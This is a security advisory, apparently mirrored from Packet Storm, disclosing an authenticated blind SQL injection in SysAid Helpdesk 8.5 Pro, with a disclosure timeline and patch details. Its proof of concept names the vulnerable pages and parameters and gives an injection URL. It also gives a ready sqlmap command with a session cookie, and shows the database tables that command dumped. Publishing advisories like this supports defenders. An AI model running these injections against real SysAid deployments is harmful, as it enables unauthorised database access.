Search...

SysAid Helpdesk 8.5 Pro SQL Injection

2012-11-30T00:00:00

ID PACKETSTORM:118500
Type packetstorm
Reporter Daniel Compton
Modified 2012-11-30T00:00:00

Description

                                        
                                            `=======  
Summary  
=======  
Name: SysAid Helpdesk Pro - Blind SQL Injection  
Release Date: 30 November 2012  
Reference: NGS00241  
Discoverer: Daniel Compton &lt;daniel.compton@ngssecure.com&gt;  
Vendor: SysAid  
Vendor Reference:   
Systems Affected: SysAid Helpdesk 8.5 Pro  
Risk: High  
Status: Published  
  
========  
TimeLine  
========  
Discovered: 12 March 2012  
Released: 12 March 2012  
Approved: 12 March 2012  
Reported: 14 March 2012  
Fixed: 1 August 2012  
Published: 30 November 2012  
  
===========  
Description  
===========  
SysAid Helpdesk V8.5.04 Pro Edition - Blind SQL Injection within the administrator interface. This is a commercial product.  
  
I. VULNERABILITY  
-------------------------  
SysAid Helpdesk V8.5.04 Pro suffers from Blind SQL injection several pages and parameters. This is exploitable as an authenticated user of the admin interface.  
  
II. BACKGROUND  
-------------------------  
SyAid is a fully web based helpdesk solution.  
  
http://www.ilient.com/  
  
III. DESCRIPTION  
-------------------------  
SQL injection has been found and exploited/confirmed within the software as an authenticated user. This is the latest version of SysAid Helpdesk.  
  
  
=================  
Technical Details  
=================  
IV. PROOF OF CONCEPT  
-------------------------  
  
The following URL and parameters have been confirmed to suffer from Blind SQL injection.  
  
/AssetManagementList.jsp (GET Parameter: computerID, group1)  
AssetManagementChart.jsp (GET Parameter: group1)  
/genericreport (POST Parameter: assetID, customSQL, groupFilter)  
CIEdit.jsp (POST Parameter: newClcleared, paelBtnArrayButtons)  
  
/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null'&viewName=Servers%20and%20Network%20devices  
  
python sqlmap.py  
--url="http://192.168.1.149:8080/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null&viewName=Servers%20and%20Network%20devices"  
--dbms=mysql -p computerID  
--cookie="JSESSIONID=1CDC74FF018EE7C2C0CDD3FE54DB79F2" -D ilient --level=5  
  
  
Database: ilient [10 tables]   
+-----------------------+   
| account |   
| agreement |   
| asset2ci |   
| asset_catalog |   
| asset_catalog_files |   
| asset_catalog_history |   
| asset_catalog_links |   
| asset_data_day_data |   
| asset_data_month_data |   
| asset_data_week_data |  
+-----------------------+  
  
===============  
Fix Information  
===============  
Fixed in version 8.5.08  
  
http://www.sysaid.com/bugs-fixed-8-5.htm#8508  
  
Download Product Patch:  
  
http://cdn3.sysaid.com/SysAidServerPatchFreev8.5.08.exe  
  
NCC Group Research  
http://www.nccgroup.com/research  
  
  
For more information please visit &lt;a href="http://www.mimecast.com"&gt;http://www.mimecast.com&lt;br&gt;  
This email message has been delivered safely and archived online by Mimecast.  
&lt;/a&gt;  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:118500", "type": "packetstorm", "bulletinFamily": "exploit", "title": "SysAid Helpdesk 8.5 Pro SQL Injection", "description": "", "published": "2012-11-30T00:00:00", "modified": "2012-11-30T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/118500/SysAid-Helpdesk-8.5-Pro-SQL-Injection.html", "reporter": "Daniel Compton", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:21:44", "viewCount": 0, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-11-03T10:21:44", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:21:44", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/118500/NGS00241-2.txt", "sourceData": "`======= \nSummary \n======= \nName: SysAid Helpdesk Pro - Blind SQL Injection \nRelease Date: 30 November 2012 \nReference: NGS00241 \nDiscoverer: Daniel Compton <daniel.compton@ngssecure.com> \nVendor: SysAid \nVendor Reference: \nSystems Affected: SysAid Helpdesk 8.5 Pro \nRisk: High \nStatus: Published \n \n======== \nTimeLine \n======== \nDiscovered: 12 March 2012 \nReleased: 12 March 2012 \nApproved: 12 March 2012 \nReported: 14 March 2012 \nFixed: 1 August 2012 \nPublished: 30 November 2012 \n \n=========== \nDescription \n=========== \nSysAid Helpdesk V8.5.04 Pro Edition - Blind SQL Injection within the administrator interface. This is a commercial product. \n \nI. VULNERABILITY \n------------------------- \nSysAid Helpdesk V8.5.04 Pro suffers from Blind SQL injection several pages and parameters. This is exploitable as an authenticated user of the admin interface. \n \nII. BACKGROUND \n------------------------- \nSyAid is a fully web based helpdesk solution. \n \nhttp://www.ilient.com/ \n \nIII. DESCRIPTION \n------------------------- \nSQL injection has been found and exploited/confirmed within the software as an authenticated user. This is the latest version of SysAid Helpdesk. \n \n \n================= \nTechnical Details \n================= \nIV. PROOF OF CONCEPT \n------------------------- \n \nThe following URL and parameters have been confirmed to suffer from Blind SQL injection. \n \n/AssetManagementList.jsp (GET Parameter: computerID, group1) \nAssetManagementChart.jsp (GET Parameter: group1) \n/genericreport (POST Parameter: assetID, customSQL, groupFilter) \nCIEdit.jsp (POST Parameter: newClcleared, paelBtnArrayButtons) \n \n/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null'&viewName=Servers%20and%20Network%20devices \n \npython sqlmap.py \n--url=\"http://192.168.1.149:8080/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null&viewName=Servers%20and%20Network%20devices\" \n--dbms=mysql -p computerID \n--cookie=\"JSESSIONID=1CDC74FF018EE7C2C0CDD3FE54DB79F2\" -D ilient --level=5 \n \n \nDatabase: ilient [10 tables] \n+-----------------------+ \n| account | \n| agreement | \n| asset2ci | \n| asset_catalog | \n| asset_catalog_files | \n| asset_catalog_history | \n| asset_catalog_links | \n| asset_data_day_data | \n| asset_data_month_data | \n| asset_data_week_data | \n+-----------------------+ \n \n=============== \nFix Information \n=============== \nFixed in version 8.5.08 \n \nhttp://www.sysaid.com/bugs-fixed-8-5.htm#8508 \n \nDownload Product Patch: \n \nhttp://cdn3.sysaid.com/SysAidServerPatchFreev8.5.08.exe \n \nNCC Group Research \nhttp://www.nccgroup.com/research \n \n \nFor more information please visit <a href=\"http://www.mimecast.com\">http://www.mimecast.com<br> \nThis email message has been delivered safely and archived online by Mimecast. \n</a> \n`\n"}